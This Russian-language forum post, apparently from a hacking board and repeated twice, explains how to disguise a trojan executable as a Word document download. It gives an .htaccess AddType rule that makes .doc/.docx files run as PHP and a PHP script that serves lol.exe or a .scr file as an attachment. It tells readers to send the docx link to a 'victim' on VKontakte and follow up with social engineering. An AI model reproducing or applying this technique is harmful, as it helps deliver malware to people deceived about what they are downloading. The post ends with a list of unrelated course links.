jscom
Премиум
[HIDE-REPLY-THANKS]
Доброго дня/вечера/ночи.
Сегодня мы поговорим про то, как можно подменить расширение на сервере/хостинге. Для чего это может быть использовано? Допустим вы хотите впарить определенному человеку трой, а человек ехе не принимает, тогда его сможет отвлечь этот метод. (Это был пример и он не побуждает вас совершать какие-либо противозаконные действия). Целей может быть множество.
Объясню вкратце: У вас на сервере находится файл с названием lol.exe, который должна скачать жертва. Скидывать ссылку вида domain/lol.exe немного палевно, пугает расширение exe, а вот ссылка вида domain/lol.docx или же domain/name.doc практически не вызывает подозрений и при переходе на domain/name.docx будет скачиваться ваш заданный файл, на нашем примере — это lol.exe. После того, как вы прочитаете статью статью до конца, то вы сможете создавать свои ссылки такого.
Ну что же, давайте приступим.
1. Открываем блокнот, туда пишем:
AddType application/x-httpd-php .doc .docx
Сохраняем это, как .htaccess, затем заливаем на хостинг/сервер в корень или в ту папку, где будет находиться ваш exe файл. В моем случае — это в корень сайта. Ставим права 644 или 444.
2. Теперь нужно создать php скрипт с расширением .doc или .docx, при обращении к которому вылезет предложение скачать ваш файл. Открываем блокнот и пишем:
<?
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=имя файла’);
echo file_get_contents(‘путь к файлу’);
?>
Пример:
<?
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=lol.exe‘);
echo file_get_contents(‘http://domain/lol.exe‘);
?>
Если же вы заливаете в корень, то можно написать последнюю строчку и так:
echo file_get_contents(‘lol.exe‘);
Если exe сильно мозолит глаза, то можно изменить расширение с .exe на .scr (разницы нету), если делаете замену на .scr, то меняется путь к файлу, а точнее расширение.
Сохраняем данный скрипт под названием name.docx (name — ваше имя файла). Имя exe и имя скрипта должны совпадать. Заливаем на хостинг/сервер.
Теперь даем жертве ссылку: http://domain/name.docx, он или она переходит и скачивает файл. Также можно ссылку скинуть вконтакте, жертва посмотрит, что расширение docx и скорее всего скачает, а дальше используйте СИ.
[/HIDE-REPLY-THANKS]
Доброго дня/вечера/ночи.
Сегодня мы поговорим про то, как можно подменить расширение на сервере/хостинге. Для чего это может быть использовано? Допустим вы хотите впарить определенному человеку трой, а человек ехе не принимает, тогда его сможет отвлечь этот метод. (Это был пример и он не побуждает вас совершать какие-либо противозаконные действия). Целей может быть множество.
Объясню вкратце: У вас на сервере находится файл с названием lol.exe, который должна скачать жертва. Скидывать ссылку вида domain/lol.exe немного палевно, пугает расширение exe, а вот ссылка вида domain/lol.docx или же domain/name.doc практически не вызывает подозрений и при переходе на domain/name.docx будет скачиваться ваш заданный файл, на нашем примере — это lol.exe. После того, как вы прочитаете статью статью до конца, то вы сможете создавать свои ссылки такого.
Ну что же, давайте приступим.
1. Открываем блокнот, туда пишем:
AddType application/x-httpd-php .doc .docx
Сохраняем это, как .htaccess, затем заливаем на хостинг/сервер в корень или в ту папку, где будет находиться ваш exe файл. В моем случае — это в корень сайта. Ставим права 644 или 444.
2. Теперь нужно создать php скрипт с расширением .doc или .docx, при обращении к которому вылезет предложение скачать ваш файл. Открываем блокнот и пишем:
<?
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=имя файла’);
echo file_get_contents(‘путь к файлу’);
?>
Пример:
<?
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=lol.exe‘);
echo file_get_contents(‘http://domain/lol.exe‘);
?>
Если же вы заливаете в корень, то можно написать последнюю строчку и так:
echo file_get_contents(‘lol.exe‘);
Если exe сильно мозолит глаза, то можно изменить расширение с .exe на .scr (разницы нету), если делаете замену на .scr, то меняется путь к файлу, а точнее расширение.
Сохраняем данный скрипт под названием name.docx (name — ваше имя файла). Имя exe и имя скрипта должны совпадать. Заливаем на хостинг/сервер.
Теперь даем жертве ссылку: http://domain/name.docx, он или она переходит и скачивает файл. Также можно ссылку скинуть вконтакте, жертва посмотрит, что расширение docx и скорее всего скачает, а дальше используйте СИ.
[/HIDE-REPLY-THANKS]
Возможно, Вас ещё заинтересует:
- [Светлана Тараканова] Программа для проведения вечера встречи выпускников (2025)
- [Grasser] Платье в двух длинах, выкройка №1186. Размер 38-52. Рост 164-170
- [Точка Интеллекта] Методология и философия истории. Лекция 11. Стадиальные теории
- [Эрмитаж] Ювелирный дом Boucheron (2025)
- [zefir_buton] Канал по упаковке
- [Точка Интеллекта] Удовольствие от чтения - зарубежная литература. II цикл. Лекция 6. Новый Орфей (2025)
- [Дарья Черненко] Система простых заготовок (2025)
- [МГИМО] Применение искусственного интеллекта в банках
- [Наталья Суранова] Сладкая вата. Добрый слон
- [Таким путем] Древний Рим. Женщины в Римской империи. Лекция 6
- [lectoroom] Секреты создания игрушки из ваты (2025)
- [Татьяна Гольцова] Видение. Урок 1. Пятна и линии
- [Татьяна Гольцова] Видение. Урок 2. Захват внимания (основные приемы) (2025)
- [Scrap Melange] Донат-клуб Scrap Melange (март) (2025)
- [Ольга Лазарева] Пломбиры (2025)
- [Лариса Коренова] Курс на лето (2025)
- [Grasser] Куртка, выкройка №1207. Размер 40-54. Рост 164-170 (2025)
- [Школа Низкоуглеводных Десертов] Зефир без сахара (2025)
- [Вера Терекбаева] Подписка VK Donat Мастерская Веры Терекбаевой (март) (2025)
- [Надежда Такташкина] Легкие десерты. Тариф Двойная легкость (2025)
